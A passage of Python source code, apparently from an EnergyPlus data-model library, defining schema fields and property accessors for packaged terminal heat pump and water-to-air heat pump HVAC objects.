(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:DX:SingleSpeed',
u'Coil:Heating:DX:VariableSpeed'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating convergence tolerance',
{'name': u'Heating Convergence Tolerance',
'pyname': u'heating_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'minimum outdoor dry-bulb temperature for compressor operation',
{'name': u'Minimum Outdoor Dry-Bulb Temperature for Compressor Operation',
'pyname': u'minimum_outdoor_drybulb_temperature_for_compressor_operation',
'default': -8.0,
'required-field': False,
'autosizable': False,
'minimum': -20.0,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:DX:SingleSpeed',
u'Coil:Cooling:DX:VariableSpeed',
u'CoilSystem:Cooling:DX:HeatExchangerAssisted'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling convergence tolerance',
{'name': u'Cooling Convergence Tolerance',
'pyname': u'cooling_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'supplemental heating coil object type',
{'name': u'Supplemental Heating Coil Object Type',
'pyname': u'supplemental_heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Gas',
u'Coil:Heating:Electric',
u'Coil:Heating:Water',
u'Coil:Heating:Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supplemental heating coil name',
{'name': u'Supplemental Heating Coil Name',
'pyname': u'supplemental_heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum supply air temperature from supplemental heater',
{'name': u'Maximum Supply Air Temperature from Supplemental Heater',
'pyname': u'maximum_supply_air_temperature_from_supplemental_heater',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'maximum outdoor dry-bulb temperature for supplemental heater operation',
{'name': u'Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation',
'pyname': u'maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation',
'default': 21.0,
'maximum': 21.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'default': u'DrawThrough',
'required-field': False,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 27,
'name': u'ZoneHVAC:PackagedTerminalHeatPump',
'pyname': u'ZoneHvacPackagedTerminalHeatPump',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Unique name for this packaged terminal heat pump object.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
| Schedule values of 0 denote the unit is off.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
| Air inlet node for the PTHP must be a zone air exhaust node.
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
| Air outlet node for the PTHP must be a zone air inlet node.
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
"""field `Outdoor Air Mixer Object Type`
| currently only one OutdoorAir:Mixer object type is available.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_object_type` or None if not set
"""
return self["Outdoor Air Mixer Object Type"]
@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Object Type`"""
self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
"""field `Outdoor Air Mixer Name`
| Needs to match name of outdoor air mixer object.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_name` or None if not set
"""
return self["Outdoor Air Mixer Name"]
@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Name`"""
self["Outdoor Air Mixer Name"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate(self):
    """Current value of IDD field `Heating Supply Air Flow Rate`.

    | Must be less than or equal to fan size.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Heating Supply Air Flow Rate"]

@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
    """Set IDD field `Heating Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Heating Supply Air Flow Rate"] = value
@property
def no_load_supply_air_flow_rate(self):
    """Current value of IDD field `No Load Supply Air Flow Rate`.

    | Must be less than or equal to fan size.
    | Only used when heat pump fan operating mode is continuous. This air flow rate
    | is used when no heating or cooling is required and the DX coil compressor is off.
    | If this field is left blank or zero, the supply air flow rate from the previous
    | on cycle (either cooling or heating) is used.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["No Load Supply Air Flow Rate"]

@no_load_supply_air_flow_rate.setter
def no_load_supply_air_flow_rate(self, value=None):
    """Set IDD field `No Load Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["No Load Supply Air Flow Rate"] = value
@property
def cooling_outdoor_air_flow_rate(self):
    """Current value of IDD field `Cooling Outdoor Air Flow Rate`.

    | Must be less than or equal to supply air flow rate during cooling operation.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Cooling Outdoor Air Flow Rate"]

@cooling_outdoor_air_flow_rate.setter
def cooling_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `Cooling Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Cooling Outdoor Air Flow Rate"] = value
@property
def heating_outdoor_air_flow_rate(self):
    """Current value of IDD field `Heating Outdoor Air Flow Rate`.

    | Must be less than or equal to supply air flow rate during heating operation.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Heating Outdoor Air Flow Rate"]

@heating_outdoor_air_flow_rate.setter
def heating_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `Heating Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Heating Outdoor Air Flow Rate"] = value
@property
def no_load_outdoor_air_flow_rate(self):
    """Current value of IDD field `No Load Outdoor Air Flow Rate`.

    | Only used when heat pump Fan operating mode is continuous. This air flow rate
    | is used when no heating or cooling is required and the DX coil compressor is off.
    | If this field is left blank or zero, the outdoor air flow rate from the previous
    | on cycle (either cooling or heating) is used.
    | Units: m3/s

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["No Load Outdoor Air Flow Rate"]

@no_load_outdoor_air_flow_rate.setter
def no_load_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `No Load Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["No Load Outdoor Air Flow Rate"] = value
@property
def supply_air_fan_object_type(self):
    """Current value of IDD field `Supply Air Fan Object Type`.

    | Fan:ConstantVolume only works with fan operating mode is continuous.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Supply Air Fan Object Type"]

@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
    """Set IDD field `Supply Air Fan Object Type`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
    """Current value of IDD field `Supply Air Fan Name`.

    | Needs to match a fan object.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Supply Air Fan Name"]

@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
    """Set IDD field `Supply Air Fan Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Supply Air Fan Name"] = value
@property
def heating_coil_object_type(self):
    """Current value of IDD field `Heating Coil Object Type`.

    | Only works with Coil:Heating:DX:SingleSpeed or
    | Coil:Heating:DX:VariableSpeed.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Heating Coil Object Type"]

@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
    """Set IDD field `Heating Coil Object Type`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
    """Current value of IDD field `Heating Coil Name`.

    | Needs to match in the DX Heating Coil object.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Heating Coil Name"]

@heating_coil_name.setter
def heating_coil_name(self, value=None):
    """Set IDD field `Heating Coil Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Heating Coil Name"] = value
@property
def heating_convergence_tolerance(self):
    """Current value of IDD field `Heating Convergence Tolerance`.

    | Defines Heating convergence tolerance as a fraction of Heating load to be met.
    | Units: dimensionless
    | Default value: 0.001

    Returns:
        float: the stored value, or None if not set
    """
    return self["Heating Convergence Tolerance"]

@heating_convergence_tolerance.setter
def heating_convergence_tolerance(self, value=0.001):
    """Set IDD field `Heating Convergence Tolerance`.

    Args:
        value (float): value for the field (default 0.001)

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Heating Convergence Tolerance"] = value
@property
def minimum_outdoor_drybulb_temperature_for_compressor_operation(self):
    """Current value of IDD field `Minimum Outdoor Dry-Bulb Temperature for Compressor Operation`.

    | Needs to match the corresponding minimum outdoor temperature defined
    | in the DX Heating Coil object.
    | Units: C
    | Default value: -8.0
    | value >= -20.0

    Returns:
        float: the stored value, or None if not set
    """
    return self["Minimum Outdoor Dry-Bulb Temperature for Compressor Operation"]

@minimum_outdoor_drybulb_temperature_for_compressor_operation.setter
def minimum_outdoor_drybulb_temperature_for_compressor_operation(self, value=-8.0):
    """Set IDD field `Minimum Outdoor Dry-Bulb Temperature for Compressor Operation`.

    Args:
        value (float): value for the field in C (default -8.0)

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Minimum Outdoor Dry-Bulb Temperature for Compressor Operation"] = value
@property
def cooling_coil_object_type(self):
    """Current value of IDD field `Cooling Coil Object Type`.

    | Only works with Coil:Cooling:DX:SingleSpeed or
    | CoilSystem:Cooling:DX:HeatExchangerAssisted or
    | Coil:Cooling:DX:VariableSpeed.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Cooling Coil Object Type"]

@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
    """Set IDD field `Cooling Coil Object Type`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
    """Current value of IDD field `Cooling Coil Name`.

    | Needs to match in the DX Cooling Coil object.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Cooling Coil Name"]

@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
    """Set IDD field `Cooling Coil Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Cooling Coil Name"] = value
@property
def cooling_convergence_tolerance(self):
    """Current value of IDD field `Cooling Convergence Tolerance`.

    | Defines Cooling convergence tolerance as a fraction of the Cooling load to be met.
    | Units: dimensionless
    | Default value: 0.001

    Returns:
        float: the stored value, or None if not set
    """
    return self["Cooling Convergence Tolerance"]

@cooling_convergence_tolerance.setter
def cooling_convergence_tolerance(self, value=0.001):
    """Set IDD field `Cooling Convergence Tolerance`.

    Args:
        value (float): value for the field (default 0.001)

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Cooling Convergence Tolerance"] = value
@property
def supplemental_heating_coil_object_type(self):
    """Current value of IDD field `Supplemental Heating Coil Object Type`.

    | works with gas, electric, hot water and steam heating coil.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Supplemental Heating Coil Object Type"]

@supplemental_heating_coil_object_type.setter
def supplemental_heating_coil_object_type(self, value=None):
    """Set IDD field `Supplemental Heating Coil Object Type`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Supplemental Heating Coil Object Type"] = value
@property
def supplemental_heating_coil_name(self):
    """Current value of IDD field `Supplemental Heating Coil Name`.

    | Needs to match in the supplemental heating coil object.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Supplemental Heating Coil Name"]

@supplemental_heating_coil_name.setter
def supplemental_heating_coil_name(self, value=None):
    """Set IDD field `Supplemental Heating Coil Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Supplemental Heating Coil Name"] = value
@property
def maximum_supply_air_temperature_from_supplemental_heater(self):
    """Current value of IDD field `Maximum Supply Air Temperature from Supplemental Heater`.

    | Supply air temperature from the supplemental heater will not exceed this value.
    | Units: C

    Returns:
        float or "Autosize": the stored value, or None if not set
    """
    return self["Maximum Supply Air Temperature from Supplemental Heater"]

@maximum_supply_air_temperature_from_supplemental_heater.setter
def maximum_supply_air_temperature_from_supplemental_heater(self, value=None):
    """Set IDD field `Maximum Supply Air Temperature from Supplemental Heater`.

    Args:
        value (float or "Autosize"): value for the field in C

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Maximum Supply Air Temperature from Supplemental Heater"] = value
@property
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(self):
    """Current value of IDD field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`.

    | Supplemental heater will not operate when outdoor temperature exceeds this value.
    | Units: C
    | Default value: 21.0
    | value <= 21.0

    Returns:
        float: the stored value, or None if not set
    """
    return self["Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"]

@maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation.setter
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(self, value=21.0):
    """Set IDD field `Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation`.

    Args:
        value (float): value for the field in C (default 21.0)

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation"] = value
@property
def fan_placement(self):
    """Current value of IDD field `Fan Placement`.

    | Select fan placement as either blow through or draw through.
    | Default value: DrawThrough

    Returns:
        str: the stored value, or None if not set
    """
    return self["Fan Placement"]

@fan_placement.setter
def fan_placement(self, value="DrawThrough"):
    """Set IDD field `Fan Placement`.

    Args:
        value (str): value for the field (default "DrawThrough")

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Fan Placement"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
    """Current value of IDD field `Supply Air Fan Operating Mode Schedule Name`.

    | Enter the name of a schedule that controls fan operation. Schedule values of 0
    | denote cycling fan operation (fan cycles with cooling or heating coil). Schedule
    | values greater than 0 denote constant fan operation (fan runs continually
    | regardless of coil operation). The fan operating mode defaults to cycling fan
    | operation if this field is left blank.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Supply Air Fan Operating Mode Schedule Name"]

@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
    """Set IDD field `Supply Air Fan Operating Mode Schedule Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def availability_manager_list_name(self):
    """Current value of IDD field `Availability Manager List Name`.

    | Enter the name of an AvailabilityManagerAssignmentList object.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Availability Manager List Name"]

@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
    """Set IDD field `Availability Manager List Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
    """Current value of IDD field `Design Specification ZoneHVAC Sizing Object Name`.

    | Enter the name of a DesignSpecificationZoneHVACSizing object.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Design Specification ZoneHVAC Sizing Object Name"]

@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
    """Set IDD field `Design Specification ZoneHVAC Sizing Object Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacWaterToAirHeatPump(DataObject):
""" Corresponds to IDD object `ZoneHVAC:WaterToAirHeatPump`
Water-to-air heat pump. Forced-convection heating-cooling unit with supply fan,
water-to-air cooling and heating coils, supplemental heating coil (gas, electric, hot
water, or steam), and fixed-position outdoor air mixer.
"""
# IDD schema for the ZoneHVAC:WaterToAirHeatPump object: maps each lowercase
# field key to its metadata (display name, python attribute name, required
# flag, autosizable/autocalculatable flags, accepted values, numeric limits,
# defaults, and units). Consumed by the DataObject base class for field
# lookup, validation, and IDF serialization. Field order is significant,
# hence the OrderedDicts.
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': False,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load supply air flow rate',
{'name': u'No Load Supply Air Flow Rate',
'pyname': u'no_load_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling outdoor air flow rate',
{'name': u'Cooling Outdoor Air Flow Rate',
'pyname': u'cooling_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating outdoor air flow rate',
{'name': u'Heating Outdoor Air Flow Rate',
'pyname': u'heating_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load outdoor air flow rate',
{'name': u'No Load Outdoor Air Flow Rate',
'pyname': u'no_load_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:WaterToAirHeatPump:EquationFit',
u'Coil:Heating:WaterToAirHeatPump:VariableSpeedEquationFit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:WaterToAirHeatPump:EquationFit',
u'Coil:Cooling:WaterToAirHeatPump:VariableSpeedEquationFit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum cycling rate',
{'name': u'Maximum Cycling Rate',
'pyname': u'maximum_cycling_rate',
'default': 2.5,
'maximum': 5.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'cycles/hr'}),
(u'heat pump time constant',
{'name': u'Heat Pump Time Constant',
'pyname': u'heat_pump_time_constant',
'default': 60.0,
'maximum': 500.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u's'}),
(u'fraction of on-cycle power use',
{'name': u'Fraction of On-Cycle Power Use',
'pyname': u'fraction_of_oncycle_power_use',
'default': 0.01,
'maximum': 0.05,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real'}),
(u'heat pump fan delay time',
{'name': u'Heat Pump Fan Delay Time',
'pyname': u'heat_pump_fan_delay_time',
'default': 60.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u's'}),
(u'supplemental heating coil object type',
{'name': u'Supplemental Heating Coil Object Type',
'pyname': u'supplemental_heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Gas',
u'Coil:Heating:Electric',
u'Coil:Heating:Water',
u'Coil:Heating:Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supplemental heating coil name',
{'name': u'Supplemental Heating Coil Name',
'pyname': u'supplemental_heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum supply air temperature from supplemental heater',
{'name': u'Maximum Supply Air Temperature from Supplemental Heater',
'pyname': u'maximum_supply_air_temperature_from_supplemental_heater',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'maximum outdoor dry-bulb temperature for supplemental heater operation',
{'name': u'Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation',
'pyname': u'maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation',
'default': 21.0,
'maximum': 21.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'outdoor dry-bulb temperature sensor node name',
{'name': u'Outdoor Dry-Bulb Temperature Sensor Node Name',
'pyname': u'outdoor_drybulb_temperature_sensor_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'default': u'BlowThrough',
'required-field': False,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heat pump coil water flow mode',
{'name': u'Heat Pump Coil Water Flow Mode',
'pyname': u'heat_pump_coil_water_flow_mode',
'default': u'Cycling',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Constant',
u'Cycling',
u'ConstantOnDemand'],
'autocalculatable': False,
'type': 'alpha'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 25,
'name': u'ZoneHVAC:WaterToAirHeatPump',
'pyname': u'ZoneHvacWaterToAirHeatPump',
'required-object': False,
'unique-object': False}
@property
def name(self):
    """Current value of IDD field `Name`.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Name"]

@name.setter
def name(self, value=None):
    """Set IDD field `Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Name"] = value
@property
def availability_schedule_name(self):
    """Current value of IDD field `Availability Schedule Name`.

    | Availability schedule name for this system. Schedule value > 0 means the
    | system is available. If this field is blank, the system is always available.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Availability Schedule Name"]

@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
    """Set IDD field `Availability Schedule Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Availability Schedule Name"] = value
@property
def air_inlet_node_name(self):
    """Current value of IDD field `Air Inlet Node Name`.

    Returns:
        str: the stored value, or None if not set
    """
    return self["Air Inlet Node Name"]

@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
    """Set IDD field `Air Inlet Node Name`.

    Args:
        value (str): value for the field

    Raises:
        ValueError: if `value` is not a valid value
    """
    self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
    """Current value of IDD field `Air Outlet Node Name`.

    Returns:
        str: the stored value, or None if not set
    """
